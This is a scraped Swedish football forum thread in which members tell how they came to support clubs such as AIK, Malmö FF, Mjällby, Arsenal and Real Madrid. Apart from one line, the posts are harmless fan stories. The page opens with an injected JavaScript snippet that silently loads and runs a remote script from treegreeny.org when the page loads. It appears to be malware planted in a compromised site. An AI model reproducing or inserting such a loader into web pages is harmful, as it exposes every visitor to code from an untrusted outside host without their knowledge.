;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Hur började du hålla på ditt / dina lag? – Fotboll – FMSweden Forum
Meny Stäng

Hur började du håll...
 
Share:
Notifications
Clear all

Hur började du hålla på ditt / dina lag?

20 Inlägg
16 Users
76 Reactions
1,202 Visningar
Karamellkungen
(@casper)
Active Member
Blev medlem: 4 år sedan
Inlägg: 17
Topic starter  

Hur började ni alla supporta era lag? 

Jag själv håller på Arsenal och MFF, Farsan har hållt på Arsenal sedan han var liten och som nästan varje fotbollsintresserad malmöit så är Malmö FF laget i våra hjärtan! Att som liten gå på match en MFF match med fotbollslaget till att själv stå på läktaren varje match. 

Maratontabellen


   
Calibre, Micke, JS7 and 1 people reacted
Citera
jonatannk
(@jonatannk)
Estimable Member
Blev medlem: 4 år sedan
Inlägg: 93
 

Kul!

Håller på AIK och Chelsea. Har ett gott öga för Atlético Madrid, men kan inte påstå att jag håller på eller följer dom.

 

AIK - Farsan tog mig och min storebror på matcher genom hela vår barndom. Satt och grät i min keps på norra övre när AIK låg under med 0-3 mot Dif. Någonting som även hade fångats av tv-kamerorna fick jag höra. Denna match slutade sedermera 3-3 efter sen kvittering av Samuel Ayorinde. Sedan dess har jag varit på mer matcher än jag kan räkna till.

Chelsea - Ska ej sticka under stolen med att jag i ung ålder hejade på Man Utd på grund av van Nistelrooy, Beckham, Scholes, Ronaldo m.fl. Min storebror fattade däremot rejält tycke för Giafranco Zola och Chelsea. Lillebror som man är blev jag inspirerad och började väl följa Chelsea mer seriöst runt 2007 tror jag. Sedan har jag varit fast. Har tyvärr inte varit på någon match ännu, trots flertalet Londonbesök. Men det står på min bucketlist.

Atlético har jag gott öga för då jag såg Fernando Torres springa runt som 19-åring med kaptensbindel. Då blev jag kär i inte bara Atlético utan även Torres, vars karriär jag följde till slutet.

Who has two thumbs and doesn't give a crap?


   
JS7 and Phansell reacted
SvaraCitera
Phogge
(@phogge)
Active Member
Blev medlem: 4 år sedan
Inlägg: 8
 

Mjällby AIF sen 2001. 

01 såg jag min första match med Mjällby, sex år gammal. Det var mormor och morfar som tog mig ut till Listerlandet, då de var trogna med sina säsongskort. 
Enda sedan dess har det varit Mjällby, har följt laget på både borta och hemmaplan genom åren, allt från Tvååker till Stockholm stadion. 

Något lag utomlands var det i små perioder när jag var yngre. Men den där äktheten och närheten till ett lag hittade jag aldrig med lagen utomlands. 

 


   
Denki, JS7 and Phansell reacted
SvaraCitera
Phansell
(@phansell)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
 

AIK - Snygga färger, snygg logga, kaxiga och hybris. Ibland behövs inte mer än så. AIK blev laget trots att flera lag finns närmre hemma.

FC St Pauli - Lite samma sak här, vi gör det på vårt vis, snygg logga. Punk-attityden och allt de står för politiskt. Alla är välkomna förutom nazister och rasister. Love it 😀 

Arsenal - Såg dem mycket på tv och det pratades mycket om dem då Fredrik Ljungberg gjorde succé där.

Har även nyligen upptäck att Rayo Vallecano står för samma saker som FC St Pauli. Så nu blir det att följa dem närmare också 🙂 

"Say it loud, say it clear, refugees are welcome here!"
- FC St Pauli


   
JS7 reacted
SvaraCitera
JS7
 JS7
(@js7)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 25
 

Kul tråd och intressant att se hur alla valt inriktning på sina lag.

1994 när man var sex år så hade jag Baggio som favorit. Fått höra att man sprang runt och skrek Baggio, Baggio. Det var inte förens 4 år efter som jag hittade min favorit spelare som jag blev svag för. 18 åriga Michael Owen vars mål mot Argentina som gjorde att jag fastna för honom. Dock så blev jag som @Jonatannk inspirerad av min äldre bror som höll på United och sen dess så har United varit klubben i hjärtat. Kan erkänna att jag handlade några tröjor på marknader med Owen på. 

 

I Sverige så har jag aldrig brunnit för något speciellt lag utan mest följt IFK Göteborg och senare Örebro eftersom jag nu bor där sedan 4 år tillbaka.

Sedan har jag säkert som många andra följt Zlatan i klubbarna som han varit verksam och hoppats att det skulle gå bra för han där. 


   
Gabriel-J and Phansell reacted
SvaraCitera
Phansell
(@phansell)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
 

@js7 Håller med dig i att vart än Zlatan spelar så har man följt det. Roligast i Milan dock. Både gångerna. 

"Say it loud, say it clear, refugees are welcome here!"
- FC St Pauli


   
JS7 reacted
SvaraCitera
Loba
 Loba
(@loba)
Active Member
Blev medlem: 4 år sedan
Inlägg: 17
 

Då fotbollsintresset i familjen är i princip noll så fick jag inget lag "gratis" när jag var liten. Höll på Manchester United i mycket unga dagar då jag såg upp till Beckham. När han lämnade så sinade intresset sakta men säkert.

Det lag som ligger närmast hjärtat idag är Northampton Town. Anledning är kort och gott tack vare FM (CM) och min äldre kusin som visade mig spelet i början på 2000-talet. 

Efter Northampton så finns det några lag som man kikar till ibland, och dessa är också tack vare FM. T.ex. Vaduz i Schweiziska ligan föll jag för efter att ha varit på bortalandskamp i Liechtenstein och sedan spelat med på FM. 

| Big city lights don't bother me, Northampton Town I'm proud to be |
#NTFC


   
Micke and Phansell reacted
SvaraCitera
maxxon
(@maxxon)
Active Member
Blev medlem: 4 år sedan
Inlägg: 9
 

DIF - kring -95 via hockey som var det jag kollade på då. Första laget jag råkade se helt enkelt. I fotboll från -98 i samband med att jag började spela CM och fick mer intresse att kolla på fotboll. Relationen fick sig en törn när Quirino köptes (kan kännas som en överreaktion så här i efterhand) och dog helt 2007 efter insikten att upplevelsen av att se laget live helt enkelt sög.

West Ham från -98: fina färger, fd fint märke och några fina spelare då (Ferdinand och Cole framför allt).


   
SvaraCitera
Deadwood
(@deadwood)
Trusted Member Admin
Blev medlem: 4 år sedan
Inlägg: 28
 

AIK:

Hockey var större när jag växte upp, i synnerhet kring hockeybild-hysterin. Och jag går alltid emot alla andra, så medans alla andra samlade på Färjestad, Djurgården, Frölunda och Modo så samlade jag på AIK. Det första AIK-kortet jag hade var ett kort som en Djurgårdare delade på mitten och kastade. Jag tog upp det, tejpade ihop det och tog hem det. Det sitter än idag kvar i pärmen.

 

Sen när fotboll blev mer intressant så hängde det med. Och tur nog höll alla på Hammarby och Djurgården där med. Så det var lättare för mig att fortsätta hålla på AIK.

 

 

Whiskykonnässör, Whiskyinfluencer, Provningsledare, Specialist @ Whiskybase.


   
SvaraCitera
Daniel Nilsson
(@daniel-nilsson)
Noble Member Admin
Blev medlem: 4 år sedan
Inlägg: 498
 

När jag växte upp var Barcelona laget i hjärtat och det berodde på Ronaldinho. Vilken fotbollsspelare han var!

Min morbror höll på Helsingborg och Manchester United och gav mig tröjor, halsdukar och tog med mig på HIF-matcher men likt förbannat håller jag på Malmö FF och Manchester City idag. Hur kommer det sig?

Min farbror kommer från Malmö och är rätt hård i tonen. Man SKA hålla på Malmö, så är det bara. Och min kusin var/är min bästa vän så det var naturligt att man då snackade om Malmö FF. Jag kan inte säga att jag tvingades in i klubben utan det kändes bara rätt helt enkelt.

Gällande Manchester City så var det tack vare Svennis som jag började hålla på den klubben. De spelare han tog in och vad han åstadkom samtidigt som den dåvarande ägaren, före detta premiärminister i Thailand(Thaksin Shinawatra), höll på med var ju otroligt idiotiskt och lyckades dessutom med bedriften att sparka vår landsman, trots godkända resultat. Martin Petrov, Elano, självmåls-Dunne och Rolando Bianchi var bara några av spelare jag aldrig kommer att glömma. Därefter kom oljepengarna och resten är historia.

För övrigt håller jag på Rögle BK i hockey; jag bor trots allt i Ängelholm. Men jag hade några år där jag vägrade Rögle och det berodde på att det var gamla så kallade "kompisar" som kom upp i A-laget. De betedde sig som riktiga idioter. När de försvann kom mitt supporterskap tillbaka. Kalla det vad ni vill men så är det.


   
Micke, Phansell, JS7 and 1 people reacted
SvaraCitera
vicke231
(@vicke231)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 35
 

Liverpool. Pga av farsan så har jag sedan mycket tidig ålder sett varenda jävla match. Intresset har faktiskt sviktat något under de senaste åren (trots ett par magiska sådana), men man har ju såklart ändå suttit bänkad. 

Pittsburgh Steelers i NFL. Släkt på andra sidan pölen gjorde att intresset alltid har varit stort för den Amerikanska sportvärlden. Just Pittsburgh är väll från början en kombo mellan släkt och att Troy Polamalu spelade där på den tiden. Följs lite väl slaviskt för mitt eget bästa, även under off season. Blir lite väl mycket läsande och lyssnande emellanåt.. 


   
trashbag reacted
SvaraCitera
trashbag
(@trashbag)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 193
 

Västerås SK - Jag är från Västerås och farsan tog mig med för att se stadens bästa lag. Så har gått på hemmamatcher i över 20 år och bortamatcher i snart 15 år. Brukar väl missa någon hemmamatch per säsong på grund av sjukdom och bortamatcher brukar jag alltid sikta på ungefär hälften men brukar väl bli en tredjedel på grund av sjukdom/svårt att få ihop buss för supportergruppen. Sport på plats är det bästa! Går även på bandy för att stötta föreningen och ta sig några öl med kompisar.

Málaga CF - Likt många andra var man charmad av United vid pojkåldern. För mig var det Andy Cole som gällde till 110% till farsans förtret som varit City-fan sedan 1970. Men när Cole försvann så försvann också successivt intresset för klubben och i viss mån engelsk fotboll. Gick sedan in i högstadiet (ca 15 år sen) utan favoritlag utomlands men på grund av en save på FM så blev det Málaga trots att dom då låg i andraligan i Spanien. Utefter matcherna dom spelade när jag kollade så var det full fart framåt oavsett motstånd och det charmade mig. Kan knappast säga att dom haft kvar den den spelstilen genom åren men nu är man minst sagt fast.

Brentford FC - Det är väl en skarvning att säga att Brentford är mitt lag. Men eftersom vi är sådana väldiga anglofiler här i Sverige så brukar man ibland nästan bli krävd på att ha ett favoritlag i England när man hamnar i fotbollsdiskussioner med nya människor. Och då jag följt med på Brentfords resa i cirka 10 år nu (ända från League Two) tack vare min före detta arbetskollega som är just från Brentford-området vid London så är det i så fall mitt lag i England. Att man sen under dessa år hittat massa bra saker som klubben gör (till skillnad från VSK och Málaga) så är det lätt att gilla klubben.


   
JS7, Calibre, Micke and 2 people reacted
SvaraCitera
Eken
 Eken
(@eken)
Active Member
Blev medlem: 4 år sedan
Inlägg: 8
 

DIF: Min bror och kusin, satt ofta och kolla matcher med dom två och man ville ju vara som sin storebror så blev naturligt. Sen färgerna och diverse har absolut hjälpt, så som världens bästa Kim Källström och Dembo Touray.  Svårt att komma ihåg min första match, men lågoddsare är ju bortamatch mot Elfsborg med tanke på uppvuxen i Borås. 

United: Baby face assassin, bodde i Norge och blev automatiskt att börja gilla United. Ville ha en United-tröja med Solskjaers namn på ryggen. Men pappa(som ALDRIG varit intresserad av någon sport/idrott) ansåg det var för dyrt. Så fick bara en halsduk, som jag fortfarande har kvar (tror detta var 99 eller 00). Sen även Beckham, minns att man hade hela bänken full med bilder på Beckham varje gång man öppna. 

Sen har jag ju lag som jag inte riktigt håller på utan mer följer,

Norrby. Måste man hålla på ett lag där man är ifrån så blir det fina Norrby. Kusiner, farbröder, farfar, morfar, styvfar osv har samtliga spelat där. Även min första fotbollsmatch någonsin jag gått på var faktiskt Norrby hemma på ryavallen. Minns det så väl för Norrby var så urusla och man hade någon Elfsborgsmålvakt som släppte in 5-6 mål. 

Leverkusen efter en fin FM-save. 
Palermo, rosa tröjor. Vad kan man inte gilla med det.

i NBA - Los Angeles Lakers, Kobe Bryant. Behöver man säga något mer?


   
Micke, Phansell and trashbag reacted
SvaraCitera
(@nielsen10)
New Member
Blev medlem: 4 år sedan
Inlägg: 1
 
Postad av: @phansell

AIK - Snygga färger, snygg logga, kaxiga och hybris. Ibland behövs inte mer än så. AIK blev laget trots att flera lag finns närmre hemma.

FC St Pauli - Lite samma sak här, vi gör det på vårt vis, snygg logga. Punk-attityden och allt de står för politiskt. Alla är välkomna förutom nazister och rasister. Love it 😀 

Arsenal - Såg dem mycket på tv och det pratades mycket om dem då Fredrik Ljungberg gjorde succé där.

Har även nyligen upptäck att Rayo Vallecano står för samma saker som FC St Pauli. Så nu blir det att följa dem närmare också 🙂 

Ursäkta mig, men AIK?

Är jag helt ute och cyklar nu, men visst heter du Philip? Om inte jag har helt fel så satt väl du med i Sillastrybarnas styrelse (Mjällbys supporterklubb) när de låg i Allsvenskan sist? 


   
Calibre and Phansell reacted
SvaraCitera
Phansell
(@phansell)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
 

@nielsen10, du har helt rätt i det du säger. Jag heter Philip och jag satt med i styrelsen till Sillastrybarna. En fantastisk möjlighet för en ung kille att samla på sig erfarenhet och det ser alltid snyggt ut att man varit aktiv i styrelser osv. Jag har varit med i flera genom åren, och även startat upp föreningar ifrån noll. Jag tror detta var 2006, vilket gör mig till 16 år vid tillfället. 

Som sagt, en fantastisk möjlighet att få lära sig hur det fungerar och att utöka det personliga CV:t.

Men jag har aldrig gjort en hemlighet att det är AIK som är #1. Vet fler inom Sillastrybarna och MAIF som även supportar AIK. Så inget konstigt egentligen.

 

"Say it loud, say it clear, refugees are welcome here!"
- FC St Pauli


   
SvaraCitera
Phansell
(@phansell)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
 

@eken, Älskade Norrby. Mitt första jobb som fritidsledare var i Norrby. Och flera spelare ifrån klubben var hos oss. Några har jag kontakt med än idag. Ett otroligt fint ställe jag gärna återkommer till då och då.

"Say it loud, say it clear, refugees are welcome here!"
- FC St Pauli


   
Eken reacted
SvaraCitera
JS7
 JS7
(@js7)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 25
 
Postad av: @daniel-nilsson

När jag växte upp var Barcelona laget i hjärtat och det berodde på Ronaldinho. Vilken fotbollsspelare han var!

Min morbror höll på Helsingborg och Manchester United och gav mig tröjor, halsdukar och tog med mig på HIF-matcher men likt förbannat håller jag på Malmö FF och Manchester City idag. Hur kommer det sig?

Min farbror kommer från Malmö och är rätt hård i tonen. Man SKA hålla på Malmö, så är det bara. Och min kusin var/är min bästa vän så det var naturligt att man då snackade om Malmö FF. Jag kan inte säga att jag tvingades in i klubben utan det kändes bara rätt helt enkelt.

Gällande Manchester City så var det tack vare Svennis som jag började hålla på den klubben. De spelare han tog in och vad han åstadkom samtidigt som den dåvarande ägaren, före detta premiärminister i Thailand(Thaksin Shinawatra), höll på med var ju otroligt idiotiskt och lyckades dessutom med bedriften att sparka vår landsman, trots godkända resultat. Martin Petrov, Elano, självmåls-Dunne och Rolando Bianchi var bara några av spelare jag aldrig kommer att glömma. Därefter kom oljepengarna och resten är historia.

För övrigt håller jag på Rögle BK i hockey; jag bor trots allt i Ängelholm. Men jag hade några år där jag vägrade Rögle och det berodde på att det var gamla så kallade "kompisar" som kom upp i A-laget. De betedde sig som riktiga idioter. När de försvann kom mitt supporterskap tillbaka. Kalla det vad ni vill men så är det.

Kommer ihåg Elano, riktigt trevlig lirare. Påtal om Bianchi var inte just han ganska sjuk på spelen i hans prime?

 

 

Postad av: @phansell

@js7 Håller med dig i att vart än Zlatan spelar så har man följt det. Roligast i Milan dock. Både gångerna. 

Kan bara hålla med, fram tills PSG kom in i bilden var det riktigt kul att följa de, hade ju trevligt lag även om det inte var samma som den eran som kaka & co 

 

 


   
Calibre and Phansell reacted
SvaraCitera
Gabriel-J
(@gabriel-j)
Active Member
Blev medlem: 4 år sedan
Inlägg: 12
 

IFK Göteborg 

Håller på Blåvitt då man i unga år gick på Ullevi med farsan sin, när de spelade. 
Första riktiga matchen man kommer ihåg var guldmatchen 2007 mot Trelleborg. 
Inte för att man kommer ihåg matchen, utan det var mest stämningen man kommer ihåg. 
Sedan dess har Blåvitt varit nära hjärtat. 
Har även haft årskort i flera år och varit med i mot och medgångar. Borta matcher som hemma. Europa matcher även blivit. 

Liverpool F.C. 

Ja, ganska enkelt egentligen. Men det var farsan som satt och kollade på Liverpools matcher när man var liten, man satt alltid bredvid i soffan och kollade med stora ögon när Liverpool lirade boll. 
 Dock först när man blev 12år (2012) som man fattade vad det var för lag. 
Där man plötsligt får en resa i födelsedagspresent att kolla på Liverpool i England. 
 Farsan som hållit på Liverpool sedan början på 80-talet blev det också första matchen live. 
Det var en upplevelse som man sent kommer glömma, dock 0-0 hemma mot Stoke. 
Sedan dess har man följt Liverpool slaviskt.

 

Dortmund

Följer Dortmund på håll, och det är igenom FM, när man fått se vilken potentiell utveckling den klubben har. ? 


   
Calibre, Micke and JS7 reacted
SvaraCitera
Onkel Fester
(@onkel-fester)
Trusted Member
Blev medlem: 4 år sedan
Inlägg: 67
 

Kul! 

Real Madrid är min klubb. Anledningen stavas Luis Figo. Varför var den där matchen under hösten 2002. Där hatet från bönderna i Katalonien gick en aning långt mot min lilla gullegris. Det var bestick, glasflaskor, tändare och ett vida känt grishuvud som kastades in. Jag tog Figo till mig. Där och då blev han min gubbe. Successivt så påbörjades också ett intresse för Real Madrid. Jag hade redan innan ett gott öga för klubben då de hade vunnit Champions League året innan och där jag tillsammans med bror min försökte efterlikna Zidanes mål ute på gården dagen därefter i ungefär 10 minuter, för att ganska så fort inse att min brors inläggsfot inte var Carlos dito och min volley vid 9-års ålder inte alls var i närheten av Zidanes. 

 

Allt fler stjärnor värvades in under dessa år och det fick en såklart att tycka det var sjukt ballt att följa laget. Därefter var jag världshistoriens sämsta förlorare där och då(vilket jag förvisso är fortfarande) och därför så hjälpte det såklart att välja ett lag som allt som oftast vann. Att Real till slut vann titeln efter en galen ligaavslutning i kamp med Real Sociedad hjälpte ju dessutom på traven. Matchen mot Manchester United där Ronaldo gjorde vad han ville på Old Trafford är också ett minne. En match där Real Madrid förlorade med typ 4,5-1 mot Mallorca på Santiago Bernabeu är ett annat, mindre trevligt, minne. 

 

Därefter så har jag följt laget allt mer för varje säsong som gått. Till en början fick man såklart anpassa sig efter föräldrarnas tycke och tänkande. Men allt eftersom så blev intresset och också förståelsen allt större. De senaste 10 åren har jag nog inte missat mer än en handfull matcher. Har dessutom varit ner till Madrid ett par gånger och sett laget spela. Jag vägrade lära mig engelska i grundskolans begynnelse med anledningen att jag skulle bli proffs i Real Madrid när jag blev stor och därför enbart behövde kunna Spanska. Riktigt där hamnade jag väl inte. Även om hoppet är det sista som överger en. 


   
Calibre and Micke reacted
SvaraCitera
Calibre
(@calibre)
Active Member
Blev medlem: 3 år sedan
Inlägg: 5
 

Manchester United och Milan är mina tänkta lag. 

 

För att Manchester United satsade ordentligt på triumfer tidigt 1990 och hela framgångsrika sagan fortsätter en bit in i 2000 men efter triumfen 2011/2012 Manchester United inte längre en vinnare kultur i premier league men det var inte fel med lite uppehåll av triumfer för ända från 2018/2019 har det succesivt byggt på spelare Fred var ny i världs toppen i Manchester United i 2019/2020 och 2020/2021 han har fått speltid och Manchester United lyckats mer än Oles första säsong Ole lyckas mer än Mourinho 2016/2017 och 2017/2018. James, Wan-Bissaka, Maguire och B.Fernandes(är bäst i laget men han gillas inte) var bra värvningar 2019/2020 och säsongen efteråt blev det fem värvningar Van De Beek är totalt galet köp om inte Pogba går till Juventus för Pogba bättre mittfältare än holländaren men att Ole ska sälja Pogba för att göra satsningar på holländaren Van De Beek och med stommen Maguire, McTominay, kanske Rashford också, Greenwood, James, Van De Beek, Martial, Wan-Bissaka och Shaw bl.a. och Pogba och De Gea och B.Fernandes och Fred bl.a. gillas inte. I transfermarknaden i januari jag vill se en mittback och en mittfältare kanske Eriksen i Inter går om ingen turkisk mittfältare anländer till klubben väl.

 

För att engelska giganterna hållit i 16,5 säsonger efter champions league triumfen 1998/1999.

 

För att Milan är en av Italiens framgångs rikaste klubbar och Milan är nytt lag på sistone till mig och Milan har bra turkisk mittfältare han som kan spela AM och sen VM och HM i diamant mittfält går rykten om Red Devils vill nappa på mittfältaren och han vill också vidare till ny klubb efter mindre bra säsong i SA turken var bättre poängmaskin efter han kom till Milan nu sa tablåerna att han Milan vill krita nytt kontrakt med han innan han går som bosman i sommar.

This post was modified 3 år sedan 12 times by Calibre

   
SvaraCitera
Share: